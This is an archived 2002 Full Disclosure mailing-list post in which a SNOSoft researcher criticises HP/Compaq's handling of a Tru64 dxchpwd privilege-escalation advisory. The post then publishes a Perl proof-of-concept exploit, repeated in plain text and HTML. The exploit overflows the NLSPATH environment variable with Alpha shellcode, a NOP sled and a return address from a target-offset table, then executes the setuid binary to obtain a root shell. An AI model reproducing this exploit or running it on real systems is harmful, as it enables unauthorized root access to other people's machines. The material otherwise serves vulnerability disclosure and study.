Full Disclosure mailing list archives
In regards to ... http://online.securityfocus.com/bid/5382
From: full-disclosure () lists netsys com (KF)
Date: Mon, 5 Aug 2002 12:22:18 -0700
This is a multi-part message in MIME format.
------=_NextPart_000_001C_01C23C7A.BD97E400
Content-Type: text/plain;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
In regards to ... http://online.securityfocus.com/bid/5382 and=20
http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b19-c0136=
900-14951-es-20020730.README
- SSRT2262 /usr/tcb/bin/dxchpwd (Severity - Medium) why medium? Because =
the public had not seen an exploit?
This ECO has not been through an exhaustive field test process.
Due to the experimental stage of this ECO/workaround, Hewlett-Packard
makes no representations regarding its use or performance. The
customer shall have the sole responsibility for adequate protection
and back-up data used in conjunction with this ECO/workaround.
^--- hrmm cute.=20
I think I can make one of those right quick too.=20
This SNOSoft Proof of Concept Tool has not been through an exhaustive=20
field test process. Due to the experimental stage of this Tool, SNOSoft
makes no representations regarding its use or performance. The
customer of Compaq / HP shall have the sole responsibility for adequate =
protection
and back-up data used in conjunction with his or her own system and the =
use of the
following SNO/Proof of Concept Tool.
Official SNO workaround is:
See vendor or if paranoid chmod -s everything in sight.=20
This is supposed to be the vendor fix... I have not tested it. I assume =
with the
coordination from CERT and the concious decision to release a public =
patch=20
that the vendor has provided a good workaround.
http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b19-c0136=
900-14951-es-20020730.README
Please note after all the public drama with HP look whos name ends up in =
the credit section. *grin*=20
Good find guys... lets give the HP dev staff a round of applause. =
*sarcasm*
Tru64 DXCHPWD Local Privilege Escalation Vulnerability
Credit:
Published in a Compaq security advisory.=20
Hrmm how nice of them to mention us.
I will give someone a cookie if they can tell me when NLSPATH was first =
a big issue on OTHER unix systems.=20
I hope this isn't broken... if it is don't whine to me ... fix it.=20
--- begin copyrighted material
#!/usr/bin/perl -w
#
# stripey (stripey () snosoft com)=20
#
# This code is copyrighted by Snosoft
# http://www.snosoft.com
# If you are a direct employee of HP or Compaq
# you are not aloud to look at this program or use it.=20
# in order to protect our copyright on this=20
# program we have crippled it (at least) by adding=20
# _IWORKATHP to some part of the code.If=20
# you do not work for HP or Compaq you may=20
# remove these letters at will provided this copyright notice
# remains attached to the header of this code. .=20
# As stated above if you work at hp you should=20
# not even be reading at this point. However if=20
# you are please note that by removing the letters
# _IWORKATHP from this document you are violating=20
# the DMCA section 1201(a)=20
# Also Please note that most of the targets in=20
# this are removed pending CERT releases.=20
$tgts{"0"} =3D pack("l",0x40010c04).":/usr/dt/bin/SORRY";
$tgts{"1"} =3D pack("l",0x400a7908).":/usr/bin/X11/CANTTELLYA";
$tgts{"2"} =3D pack("l",0x40014280).":/usr/sbin/HRMMM";
$tgts{"3"} =3D pack("l",0x4003c190).":/usr/bin/LALALALAL";
$tgts{"4"} =3D pack("l",0x400361f0).":/usr/bin/HARHAR";
$tgts{"5"} =3D pack("l",0x4009f2f8).":/usr/tcb/bin/dxchpwd";
$tgts{"6"} =3D pack("l",0x400120b0).":/usr/bin/OOPS";
$tgts{"7"} =3D pack("l",0x400105e8).":/usr/bin/DECLANR0X";
unless (($target,$offset,$align) =3D @ARGV,$align) {
=20
print "\nUsage: $0 <target> <offset> <align>\n\nTargets:\n\n";
foreach $key (sort(keys %tgts)) {
($a,$b) =3D split(/\:/,$tgts{"$key"});
print "\t$key. $b\n";
}
print "\n";
exit 1;
}
($a,$b) =3D split(/\:/,$tgts{"$target"});
print "*** Target: $b, Offset: $offset, Align: $align ***\n\n";
$ret =3D pack("ll",(unpack("l",$a)+$offset), 0x1);
# GOBBLES someday I will switch gears in the sweat shop and=20
# get that shellcode wrote uo. That was quite the entertaining=20
# talk or speach or whatever this weekend.=20
# shellcode by Taeho Oh=20
$sc .=3D "\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";
$sc .=3D "\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";
$sc .=3D "\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";
$sc .=3D "\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";
$sc .=3D "\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";
$sc .=3D "\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";
$sc .=3D "\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";
$sc .=3D "\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";
$sc .=3D "\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";
$sc .=3D "\x20\x35\x60\x42\xff\xff\xff\xff";
$tlen =3D (1024-(length($sc)))/4;
$buf .=3D "B"x$align;
$buf .=3D pack("l",0x47ff041f)x($tlen-1);
$buf .=3D $sc;
$buf .=3D $ret;
$ENV{"NLSPATH"} =3D $buf;
if ($target =3D=3D 7) { print "Hit ctrl-d...\n"; }
if ($target =3D=3D 6) {
exec("$b","-d","a=3Dasdf","-c","_IWORKATHP/tmp/","\'\$\{a\}\'");
} else {
exec("$b");
}
---- end copyrighted material
-KF
------=_NextPart_000_001C_01C23C7A.BD97E400
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD>
<META http-equiv=3DContent-Type content=3D"text/html; =
charset=3Diso-8859-1">
<META content=3D"MSHTML 5.50.4916.2300" name=3DGENERATOR>
<STYLE></STYLE>
</HEAD>
<BODY bgColor=3D#ffffff>
<DIV><FONT face=3DArial size=3D2>In regards to ... <A=20
href=3D"http://online.securityfocus.com/bid/5382";>http://online.securityf=
ocus.com/bid/5382</A> and=20
</FONT></DIV>
<DIV><FONT face=3DArial size=3D2><A=20
href=3D"http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b=
19-c0136900-14951-es-20020730.README">http://ftp.support.compaq.com/patch=
es/public/Readmes/unix/t64v51b19-c0136900-14951-es-20020730.README</A></F=
ONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV>- SSRT2262 /usr/tcb/bin/dxchpwd (Severity - Medium) why =
medium?=20
Because the public had not seen an exploit?</DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV>This ECO has not been through an exhaustive field test =
process.<BR>Due to=20
the experimental stage of this ECO/workaround, Hewlett-Packard<BR>makes =
no=20
representations regarding its use or performance. The<BR>customer shall =
have the=20
sole responsibility for adequate protection<BR>and back-up data used in=20
conjunction with this ECO/workaround.</DIV>
<DIV><FONT face=3DArial size=3D2>^--- hrmm cute. </FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>I think I can make one of those right =
quick too.=20
</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>
<DIV>This SNOSoft Proof of Concept Tool has not been =
through an=20
exhaustive </DIV>
<DIV>field test process. Due to the experimental stage of =
this Tool,=20
SNOSoft<BR>makes no representations regarding its use or performance.=20
The<BR>customer of Compaq / HP shall have the sole responsibility for =
adequate=20
protection<BR>and back-up data used in conjunction with his or her =
own=20
system and the use of the</DIV>
<DIV>following SNO/Proof of Concept Tool.</DIV>
<DIV></FONT><FONT face=3DArial size=3D2></FONT> </DIV></DIV>
<DIV><FONT face=3DArial size=3D2>Official SNO workaround =
is:</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>See vendor or if paranoid chmod -s =
everything in=20
sight. </FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>This is supposed to be the vendor =
fix... I have not=20
tested it. I assume with the</FONT></DIV>
<DIV><FONT face=3DArial size=3D2>coordination from CERT and the =
concious=20
decision to release a public patch </FONT></DIV>
<DIV><FONT face=3DArial size=3D2>that the vendor has provided a good=20
workaround.</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2></FONT><FONT face=3DArial size=3D2><A=20
href=3D"http://ftp.support.compaq.com/patches/public/Readmes/unix/t64v51b=
19-c0136900-14951-es-20020730.README">http://ftp.support.compaq.com/patch=
es/public/Readmes/unix/t64v51b19-c0136900-14951-es-20020730.README</A></F=
ONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>Please note after all the public =
drama with HP=20
look whos name ends up in the credit section. *grin* </FONT></DIV>
<DIV><FONT face=3DArial size=3D2>Good find guys... lets give the HP dev =
staff a=20
round of applause. *sarcasm*</FONT></DIV>
<DIV><SPAN class=3Dbodytext><FONT face=3DArial =
size=3D2></FONT></SPAN> </DIV>
<DIV><SPAN class=3Dbodytext><SPAN class=3Dmaintitle>Tru64 DXCHPWD Local =
Privilege=20
Escalation Vulnerability</SPAN></SPAN></DIV>
<DIV><SPAN class=3Dbodytext>Credit:<BR><SPAN =
class=3Dtext> =20
Published in a Compaq security=20
advisory.</SPAN> </SPAN></DIV>
<DIV><SPAN class=3Dbodytext><FONT face=3DArial =
size=3D2></FONT></SPAN> </DIV>
<DIV><SPAN class=3Dbodytext><FONT face=3DArial =
size=3D2></FONT></SPAN> </DIV>
<DIV><SPAN class=3Dbodytext><FONT face=3DArial size=3D2>Hrmm how nice of =
them to=20
mention us.</FONT></SPAN></DIV>
<DIV><SPAN class=3Dbodytext><FONT face=3DArial size=3D2>I will give =
someone a cookie=20
if they can tell me when NLSPATH was first a big issue on OTHER unix =
systems.=20
</FONT></SPAN></DIV>
<DIV><SPAN class=3Dbodytext><FONT face=3DArial =
size=3D2></FONT></SPAN> </DIV>
<DIV><SPAN class=3Dbodytext><FONT face=3DArial size=3D2>I hope this =
isn't broken... if=20
it is don't whine to me ... fix it. </FONT></SPAN></DIV>
<DIV><SPAN class=3Dbodytext><FONT face=3DArial =
size=3D2></FONT> </DIV></SPAN>
<DIV><FONT face=3DArial size=3D2>--- begin copyrighted =
material</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>#!/usr/bin/perl -w<BR>#<BR># stripey =
(<A=20
href=3D"mailto:stripey () snosoft com">stripey () snosoft com</A>) <BR>#<BR># =
This code=20
is copyrighted by Snosoft<BR># <A=20
href=3D"http://www.snosoft.com";>http://www.snosoft.com</A><BR># If you =
are a=20
direct employee of HP or Compaq<BR># you are not aloud to look at this =
program=20
or use it. <BR># in order to protect our copyright on this <BR># program =
we have=20
crippled it (at least) by adding <BR># _IWORKATHP to some part of =
the=20
code.If </FONT></DIV>
<DIV><FONT face=3DArial size=3D2># you do not work for HP or Compaq you =
may=20
</FONT></DIV>
<DIV><FONT face=3DArial size=3D2># remove these letters at will provided =
this=20
copyright notice</FONT></DIV>
<DIV><FONT face=3DArial size=3D2># remains attached to the header of =
this code. .=20
<BR># As stated above if you work at hp you should <BR># not even be =
reading at=20
this point. However if <BR># you are please note that by removing the=20
letters<BR># _IWORKATHP from this document you are violating <BR># the =
DMCA=20
section 1201(a) </FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2># Also Please note that most of the =
targets in=20
<BR># this are removed pending CERT releases. </FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>$tgts{"0"} =3D=20
pack("l",0x40010c04).":/usr/dt/bin/SORRY";<BR>$tgts{"1"} =3D=20
pack("l",0x400a7908).":/usr/bin/X11/CANTTELLYA";<BR>$tgts{"2"} =3D=20
pack("l",0x40014280).":/usr/sbin/HRMMM";<BR>$tgts{"3"} =3D=20
pack("l",0x4003c190).":/usr/bin/LALALALAL";<BR>$tgts{"4"} =3D=20
pack("l",0x400361f0).":/usr/bin/HARHAR";<BR>$tgts{"5"} =3D=20
pack("l",0x4009f2f8).":/usr/tcb/bin/dxchpwd";<BR>$tgts{"6"} =3D=20
pack("l",0x400120b0).":/usr/bin/OOPS";<BR>$tgts{"7"} =3D=20
pack("l",0x400105e8).":/usr/bin/DECLANR0X";</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>unless (($target,$offset,$align) =3D =
@ARGV,$align)=20
{<BR> =20
<BR> print "\nUsage: $0 =
<target>=20
<offset> <align>\n\nTargets:\n\n";</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial =
size=3D2> foreach=20
$key (sort(keys %tgts))=20
{<BR> &n=
bsp; =20
($a,$b) =3D=20
split(/\:/,$tgts{"$key"});<BR> &=
nbsp; =20
print "\t$key. $b\n";<BR> =20
}</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial =
size=3D2> print=20
"\n";</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial =
size=3D2> exit=20
1;<BR>}</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>($a,$b) =3D=20
split(/\:/,$tgts{"$target"});</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>print "*** Target: $b, Offset: $offset, =
Align:=20
$align ***\n\n";</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>$ret =3D =
pack("ll",(unpack("l",$a)+$offset),=20
0x1);</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2># GOBBLES someday I will switch gears =
in the sweat=20
shop and <BR># get that shellcode wrote uo. That was quite the =
entertaining=20
<BR># talk or speach or whatever this weekend. </FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2># shellcode by Taeho Oh </FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>$sc .=3D=20
"\x30\x15\xd9\x43\x11\x74\xf0\x47\x12\x14\x02\x42";<BR>$sc .=3D=20
"\xfc\xff\x32\xb2\x12\x94\x09\x42\xfc\xff\x32\xb2";<BR>$sc .=3D=20
"\xff\x47\x3f\x26\x1f\x04\x31\x22\xfc\xff\x30\xb2";<BR>$sc .=3D=20
"\xf7\xff\x1f\xd2\x10\x04\xff\x47\x11\x14\xe3\x43";<BR>$sc .=3D=20
"\x20\x35\x20\x42\xff\xff\xff\xff\x30\x15\xd9\x43";<BR>$sc .=3D=20
"\x31\x15\xd8\x43\x12\x04\xff\x47\x40\xff\x1e\xb6";<BR>$sc .=3D=20
"\x48\xff\xfe\xb7\x98\xff\x7f\x26\xd0\x8c\x73\x22";<BR>$sc .=3D=20
"\x13\x05\xf3\x47\x3c\xff\x7e\xb2\x69\x6e\x7f\x26";<BR>$sc .=3D=20
"\x2f\x62\x73\x22\x38\xff\x7e\xb2\x13\x94\xe7\x43";<BR>$sc .=3D=20
"\x20\x35\x60\x42\xff\xff\xff\xff";</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>$tlen =3D =
(1024-(length($sc)))/4;<BR>$buf .=3D=20
"B"x$align;<BR>$buf .=3D pack("l",0x47ff041f)x($tlen-1);<BR>$buf .=3D =
$sc;<BR>$buf=20
.=3D $ret;</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>$ENV{"NLSPATH"} =3D $buf;</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>if ($target =3D=3D 7) { print "Hit =
ctrl-d...\n";=20
}</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>if ($target =3D=3D 6)=20
{<BR> =20
exec("$b","-d","a=3Dasdf","-c","_IWORKATHP/tmp/","\'\$\{a\}\'");<BR>} =
else=20
{<BR> =
exec("$b");<BR>}</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>---- end copyrighted =
material</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2>-KF</FONT></DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV>
<DIV><FONT face=3DArial size=3D2></FONT> </DIV></BODY></HTML>
------=_NextPart_000_001C_01C23C7A.BD97E400--
Current thread:
- In regards to ... http://online.securityfocus.com/bid/5382 KF (Aug 05)